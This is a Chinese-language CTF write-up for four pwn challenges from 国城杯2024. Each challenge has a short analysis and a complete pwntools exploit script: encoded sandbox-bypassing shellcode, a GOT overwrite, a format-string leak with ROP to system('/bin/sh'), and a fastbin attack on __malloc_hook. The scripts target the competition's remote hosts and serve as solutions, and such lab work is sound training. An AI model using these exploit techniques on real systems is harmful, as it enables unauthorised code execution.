国城杯2024 PWN WP

alphashell

分析

要求输入字符为可见字符

sandbox禁用了open write writev read和execve等函数

EXP

from pwn import *
from ctypes import *
from ae64 import AE64
#----------------function area start----------------#
sla = lambda ch,data:p.sendlineafter(ch,data)
sda = lambda ch,data:p.sendafter(ch,data)
sd = lambda data:p.send(data)
sl = lambda data:p.sendline(data)
addr32 = lambda:u32(p.recvuntil(b"\xf7")[-4:])
addr64 = lambda:u64(p.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))
lg = lambda addr_name,addr:log.success("{} --> {}".format(addr_name,hex(addr)))
ru = lambda con:p.recvuntil(con)
def debug(bp=0):
    gdb.attach(p,bp)
    pause()
#----------------function area end------------------#

p = process("./attachment")
# p = remote('125.70.243.22','31709')
# context.log_level = 'debug'
context.arch='amd64'

sc=asm('''
xor rsi,rsi
mov rbx,0x67616c662f
push rbx
mov rdx,0
xor r10,r10
mov rdi,r10
mov rsi, rsp
mov eax,SYS_openat
syscall

mov rsi,rax
mov r10,0x100
xor rdx,rdx
mov rdi,1
mov eax,SYS_sendfile
syscall 
''')

obj = AE64()
payload = obj.encode(sc,'rdx')
# debug()
p.send(payload)


p.interactive()

beverage store

分析

类型转换错误，导致可以反向越界修改之前的内容

对于这道题，可以先修改exit got，重启程序流程

接着修改printf got为system，最后把exit got重新改为后门函数地址即可

EXP

from pwn import *
from ctypes import *
#----------------function area start----------------#
sla = lambda ch,data:p.sendlineafter(ch,data)
sda = lambda ch,data:p.sendafter(ch,data)
sd = lambda data:p.send(data)
sl = lambda data:p.sendline(data)
addr32 = lambda:u32(p.recvuntil(b"\xf7")[-4:])
addr64 = lambda:u64(p.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))
lg = lambda addr_name,addr:log.success("{} --> {}".format(addr_name,hex(addr)))
ru = lambda con:p.recvuntil(con)
def debug(bp=0):
    gdb.attach(p,bp)
    pause()
#----------------function area end------------------#
# p = process("./pwn")
p = remote('125.70.243.22','31668')
libc = ELF('./libc.so.6')
clibc = cdll.LoadLibrary('./libc.so.6')
context.log_level='debug'

ru("id")
p.send(b'B'*0x10)
clibc.srand(0x42424242)
num = clibc.rand()
ru("code:")
sl(str(num))

sleep(1)
sl(b'-4')
payload = p64(0x40133B) + p64(0x401511)
sd(payload)
sl(b'-6')

sleep(1)
sd(b'a')
libc_base = addr64() - 0x46061
lg('libc_base',libc_base)
system = libc_base + libc.sym['system']

sleep(1)
sl(b'-7')
payload = p64(system)
sd(payload)
sl(b'-4')
sleep(1)
payload = p64(0x401511)
sd(payload)


p.interactive()

Offensive_Security

分析

多线程但是未对资源加锁，输入任意同样的字符串即可绕过限制

存在格式化字符串漏洞，可泄露密码和libc基址

最后栈溢出然后getshell

EXP

from pwn import *
from ctypes import *
#----------------function area start----------------#
sla = lambda ch,data:p.sendlineafter(ch,data)
sda = lambda ch,data:p.sendafter(ch,data)
sd = lambda data:p.send(data)
sl = lambda data:p.sendline(data)
addr32 = lambda:u32(p.recvuntil(b"\xf7")[-4:])
addr64 = lambda:u64(p.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))
lg = lambda addr_name,addr:log.success("{} --> {}".format(addr_name,hex(addr)))
ru = lambda con:p.recvuntil(con)
def debug(bp=0):
    gdb.attach(p,bp)
    pause()
#----------------function area end------------------#
# p = process("./attachment")
elf = ELF('./attachment')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
# context.log_level = 'debug'
while True:
    sleep(1)
    try:
        p = remote('125.70.243.22','31652')
        sleep(0.1)
        sla('Username:','%7$s%39$p')
        ru('Welcome, \n')
        passwd = p.recv(8)
        sleep(0.1)
        sl(passwd)
        libc_leak = addr64()
        lg('libc_leak',libc_leak)
        if (libc_leak & 0xff) == 0x80:
            libc_base = libc_leak - 0x21b780
            lg('libc base',libc_base)
            sl('1')
            sl('1')
            ogs = [0xebc81,0xebc85,0xebc88]
            payload = b'A'*0x28 + p64(0x0000000000400462) + p64(0x0000000000400661) + p64(libc_base+next(libc.search(b'/bin/sh'))) + p64(libc_base+libc.sym.system)
            sla('>',payload)
            p.interactive()
            break
        else:
            raise('环境有毛病')
    except:
        p.close()
        continue

hijack_vtable

分析

没啥好分析的，add、show、delete、edit都没限制，直接fastbin attack打malloc hook

EXP

from pwn import *
from ctypes import *
#----------------function area start----------------#
sla = lambda ch,data:p.sendlineafter(ch,data)
sda = lambda ch,data:p.sendafter(ch,data)
sd = lambda data:p.send(data)
sl = lambda data:p.sendline(data)
addr32 = lambda:u32(p.recvuntil(b"\xf7")[-4:])
addr64 = lambda:u64(p.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))
lg = lambda addr_name,addr:log.success("{} --> {}".format(addr_name,hex(addr)))
ru = lambda con:p.recvuntil(con)
def debug(bp=0):
    gdb.attach(p,bp)
    pause()
#----------------function area end------------------#
# p = process("./pwn")
p = remote('125.70.243.22','31986')
libc = ELF('./libc.so.6')
context.log_level = 'debug'

def cmd(choice):
    sla('choice:',str(choice))
    
    
def add(idx,size):
    cmd(1)
    sleep(0.1)
    sla('index',str(idx))
    sleep(0.1)
    sla('size',str(size))
    
def delete(idx):
    cmd(2)
    sla('index',str(idx))
    
def edit(idx,len,con):
    cmd(3)
    sla('index',str(idx))
    sleep(0.1)
    sla('length:',str(len))
    sleep(0.1)
    sla('content:',con)
    
def show(idx):
    cmd(4)
    sla('index',str(idx))
add(0,0x100)
add(1,0x60)
delete(0)
show(0)

libc_base = addr64() - 0x39bb78
lg('libc base',libc_base)

malloc_hook = libc_base + libc.symbols['__malloc_hook']

delete(1)
edit(1,0x10,p64(malloc_hook - 0x23))

add(0,0x100)
add(1,0x60)
add(2,0x60)

edit(2,0x30,b'a'*0x13 + p64(libc_base + 0xd5c07))

add(3,0x10)
# debug()



p.interactive()